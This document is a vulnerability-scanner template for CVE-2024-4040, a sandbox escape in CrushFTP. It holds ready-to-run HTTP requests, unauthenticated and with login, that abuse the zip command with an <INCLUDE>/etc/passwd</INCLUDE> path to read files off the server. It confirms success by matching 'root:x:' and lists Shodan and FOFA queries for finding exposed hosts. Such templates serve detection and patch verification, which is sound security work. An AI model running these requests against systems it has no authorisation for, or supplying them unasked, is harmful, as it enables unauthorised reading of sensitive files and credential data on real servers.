CrushFTP VFS - Sandbox Escape LFR

id: CVE-2024-4040

info:
  name: CrushFTP VFS - Sandbox Escape LFR
  author: DhiyaneshDK,pussycat0x
  severity: critical
  description: |
    VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040.
  reference:
    - https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
    - https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
    - https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
    - https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-4040
    cwe-id: CWE-94,CWE-1336
    epss-score: 0.016
    epss-percentile: 0.87316
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: crushftp
    product: crushftp
    shodan-query:
      - "html:\"CrushFTP\""
      - http.html:"crushftp"
    fofa-query: "body=\"crushftp\""
  tags: cve,cve2024,lfr,crushftp,vfs,kev
flow: |
  if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) {
    // if username or password is not provided, run unauthenticated exploit
    http("unauth-exploit")
  } else {
    // if username and password is provided, run login script and authenticated exploit
    http("login") && http("auth-exploit")
  }

http:
  # unauthenticated exploit
  - id: unauth-exploit
    raw:
      - |
        GET /WebInterface/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "root:x:"

      - type: word
        part: header
        words:
          - "text/xml"

    extractors:
      - type: regex
        name: auth
        internal: true
        part: header_1
        group: 1
        regex:
          - 'currentAuth=([0-9a-zA-Z]+)'
  # login script
  - id: login
    raw:
      - |
        GET /WebInterface/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /WebInterface/function/ HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 111
        Origin: {{RootURL}}
        Referer: http://{{RootURL}}/WebInterface/login.html

        command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        internal: true
        words:
          - "<response>success</response>"

      - type: word
        part: header_2
        internal: true
        words:
          - "text/xml"

    extractors:
      - type: regex
        name: auth
        internal: true
        part: header_2
        group: 1
        regex:
          - 'currentAuth=([0-9a-zA-Z]+)'
  # authenticated exploit
  - id: auth-exploit
    raw:
      - |
        POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "root:x:"
# digest: 4a0a0047304502205948e827bf5269dd832ea8fc33d44f6117231bf9ad76ba8e2cb63850d4e41fb8022100dc3dd1a4a7e74dc17bfa8f30e8cf13605fbbc7bf05806d9aca6243bf03db95ac:922c64590222798bb761d5b6d8e72950